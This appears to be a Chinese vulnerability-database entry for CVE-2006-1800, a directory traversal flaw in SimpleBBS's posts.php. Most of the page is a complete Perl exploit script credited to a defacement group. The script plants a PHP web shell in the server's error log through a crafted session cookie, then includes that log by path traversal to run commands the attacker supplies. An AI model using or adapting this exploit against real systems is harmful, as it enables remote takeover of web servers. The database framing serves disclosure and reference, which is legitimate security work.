SimpleBBS posts.php 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110062 漏洞类型 路径遍历
发布时间 2006-04-13 更新时间 2006-04-18
CVE编号 CVE-2006-1800 CNNVD-ID CNNVD-200604-264
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27638
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-264
|漏洞详情
SimpleBBS1.0.6至1.0.6中的posts.php存在目录遍历漏洞。这使得远程攻击者可以借助于语言cookie(cookie中的包含..)序列包含并执行任意文件,例如将代码注入到user.php中的gl_sessioncookie中,上述程存储在error.log中。
|漏洞EXP
source: http://www.securityfocus.com/bid/17501/info

SimpleBBS is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 

An attacker can exploit this vulnerability to execute arbitrary PHP commands in the context of the webserver process. This may help attackers compromise the underlying system; other attacks are also possible.

#!/usr/bin/perl -w
# SimpleBBS v1.1(posts.php) remote command execution Xploit
#
# Discovered & Coded By rUnViRuS
# World Defacers TeaM
# WD-members: rUnViRuS - Papipsycho 
# Details
# =======
# Note : SimpleBBS v1.1(posts.php) remote command execution Xploit
#
#
# .
# .
# .
#
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
use IO::Socket;

 print "\n=============================================================================\r\n";
 print " * SimpleBBS v1.1 (posts.php) Remote Command Execution by www.worlddefacers.de *\r\n";   
 print "=============================================================================\r\n";
print "\n\n[*] WD-members: rUnViRuS - Papipsycho - r3v3ng4ns \n";
print "[*] Bug On :SimpleBBS v1.1 Software \n";
print "[*] Discovered & Coded By : rUnViRuS\n";
print "[*] Join with us to Get Prvi8 Exploit \n";
print "[*] www.worlddefacers.de\n\n\n";
 print "============================================================================\r\n";
 print "		  -=Coded by Zod, Bug Found by rUnViRuS=-\r\n";
 print "	       www.worlddefacers.de - www.world-defacers.de\r\n";
 print "============================================================================\r\n";
sub main::urlEncode {
    my ($string) = @_;
    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
    #$string# =~ tr/.//;
    return $string;
 }

$serv=$ARGV[0];
$path=$ARGV[1];
$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};

if (@ARGV < 3)
{
print "Usage:\r\n";
print "\n\n[*] usage: WD-SMPL.pl <host> <Path> <cmd>\n";
	print "[*] usage: WD-SMPL.pl www.HosT.com /SimpleBBS/ cmd (ls -ali\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}

  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
  or die "[+] Connecting ... Could not connect to host.\n\n";

  $shell='<?php ob_clean();echo"Hi Master!\r\n";ini_set("max_execution_time",0);passthru($_GET[CMD]);die;?>';
  $shell=urlEncode($shell);
  $data="loginname=sun&passwd=sun";
  print $sock "POST ".$path."users.php HTTP/1.1\r\n";
  print $sock "Host: ".$serv."\r\n";
  print $sock "Content-Length: ".length($data)."\r\n";
  print $sock "Cookie: gl_session=%27".$shell."\r\n";
  print $sock "Connection: Close\r\n\r\n";
  print $sock $data;
  close($sock);

  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
  or die "[+] Connecting ... Could not connect to host.\n\n";

  $xpl="../logs/error.log";
  $xpl=urlEncode($xpl)."%00";
  print $sock "GET ".$path."data/posts.php?cmd=".$cmd." HTTP/1.1\r\n";
  print $sock "Host: ".$serv."\r\n";
  print $sock "Cookie: language=".$xpl.";\r\n";
  print $sock "Connection: Close\r\n\r\n";

  while ($answer = <$sock>) {
    print $answer;
  }
  close($sock);
|参考资料

来源:MISC
链接:http://www.worlddefacers.de/Public/WD-SMPL.txt
来源:BID
名称:17501
链接:http://www.securityfocus.com/bid/17501
来源:BUGTRAQ
名称:20060412SimpleBBSv1.1(posts.php)remotecommandexecution
链接:http://www.securityfocus.com/archive/1/430872
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/SimpleBBS-RCE-posts.php.pl
来源:XF
名称:simplebbs-posts-command-execution(25788)
链接:http://xforce.iss.net/xforce/xfdb/25788